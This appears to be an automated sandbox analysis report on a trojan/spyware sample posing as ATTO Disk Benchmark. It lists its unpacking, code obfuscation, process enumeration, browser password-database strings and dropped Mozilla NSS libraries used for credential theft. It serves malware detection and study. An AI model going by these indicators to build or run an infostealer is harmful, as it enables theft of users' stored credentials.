Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA52370	2_2_6CA52370
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB6C360	2_2_6CB6C360
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAE6370	2_2_6CAE6370
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA58340	2_2_6CA58340
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB11CE0	2_2_6CB11CE0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB8DCD0	2_2_6CB8DCD0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA61C30	2_2_6CA61C30
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA53C40	2_2_6CA53C40
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB79C40	2_2_6CB79C40
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA43D80	2_2_6CA43D80
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB99D90	2_2_6CB99D90
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB21DC0	2_2_6CB21DC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB3D00	2_2_6CAB3D00
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA73EC0	2_2_6CA73EC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB5DE10	2_2_6CB5DE10
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CBABE70	2_2_6CBABE70
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CBD5E60	2_2_6CBD5E60
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA71F90	2_2_6CA71F90
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAFBFF0	2_2_6CAFBFF0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB6DFC0	2_2_6CB6DFC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CBD3FC0	2_2_6CBD3FC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA85F20	2_2_6CA85F20

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: String function: 6CB89F30 appears 31 times
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: String function: 009247E8 appears 38 times
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: String function: 6CA73620 appears 73 times
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: String function: 009304BC appears 37 times
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: String function: 6CA79B10 appears 73 times
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: String function: 009305DE appears 71 times

PE file contains executable resources (Code or Archives)

Source: 7ZthFNAqYp.exe	Static PE information: Resource name: None type: DOS executable (COM)
Source: AttoConvertVideo.exe.0.dr	Static PE information: Resource name: None type: DOS executable (COM)

Sample file is different than original file name gathered from version info

Source: 7ZthFNAqYp.exe	Binary or memory string: OriginalFilename vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000000.00000000.2134642418.000000000082F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000000.00000002.2332999034.0000000002E74000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3406548089.000000002C66D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3410535288.0000000038547000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3392292376.000000000082F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3417574339.000000006FD92000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe	Binary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe

Uses 32bit PE files

Source: 7ZthFNAqYp.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/22@3/4

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_6CAB0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

2_2_6CAB0300

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_0093147A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

2_2_0093147A

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

2_2_0093196C

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

File created: C:\Users\user\Music\AttoDesignerUpdater

Jump to behavior

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: 7ZthFNAqYp.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125180358.00000000011D4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3102837907.00000000011AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: 7ZthFNAqYp.exe	ReversingLabs: Detection: 44%
Source: 7ZthFNAqYp.exe	Virustotal: Detection: 44%

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

File read: C:\Users\user\Desktop\7ZthFNAqYp.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Process created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Process created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: k7rn7l32.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: ntd3ll.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: 7ZthFNAqYp.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 7ZthFNAqYp.exe

Static file information: File size 5233152 > 1048576

Source: 7ZthFNAqYp.exe	Static PE information: section name: RT_CURSOR
Source: 7ZthFNAqYp.exe	Static PE information: section name: RT_BITMAP
Source: 7ZthFNAqYp.exe	Static PE information: section name: RT_ICON
Source: 7ZthFNAqYp.exe	Static PE information: section name: RT_MENU
Source: 7ZthFNAqYp.exe	Static PE information: section name: RT_DIALOG
Source: 7ZthFNAqYp.exe	Static PE information: section name: RT_STRING
Source: 7ZthFNAqYp.exe	Static PE information: section name: RT_ACCELERATOR
Source: 7ZthFNAqYp.exe	Static PE information: section name: RT_GROUP_ICON

Source: 7ZthFNAqYp.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x25c800
Source: 7ZthFNAqYp.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x214200

Source: 7ZthFNAqYp.exe

Static PE information: More than 200 imports for USER32.dll

Source: 7ZthFNAqYp.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source:	Binary string: freebl3.pdbp source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source:	Binary string: nss3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: softokn3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3410535288.0000000038547000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3406548089.000000002C66D000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
Source:	Binary string: nss3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: mozglue.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\dev\sw\hbautil\source\windows\bench32\Release\Bench32.exe.pdb source: 7ZthFNAqYp.exe, AttoConvertVideo.exe.0.dr

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Unpacked PE file: 2.2.7ZthFNAqYp.exe.20020000.4.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

2_2_00938ADE

PE file contains an invalid checksum

Source: 7ZthFNAqYp.exe

Static PE information: real checksum: 0x4238d5 should be: 0x506581

PE file contains sections with non-standard names

Source: freebl3.dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr	Static PE information: section name: .didat
Source: softokn3.dll.2.dr	Static PE information: section name: .00cfg
Source: nss3.dll.2.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0094F2D2 push ecx; ret	2_2_0094F2E5
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0094CE9A push ecx; retf	2_2_0094CE9B
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00942EC9 push esi; ret	2_2_00942ECB
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00952715 push 0000004Ch; iretd	2_2_00952726
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0093DF45 push ecx; ret	2_2_0093DF58

Drops PE files

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

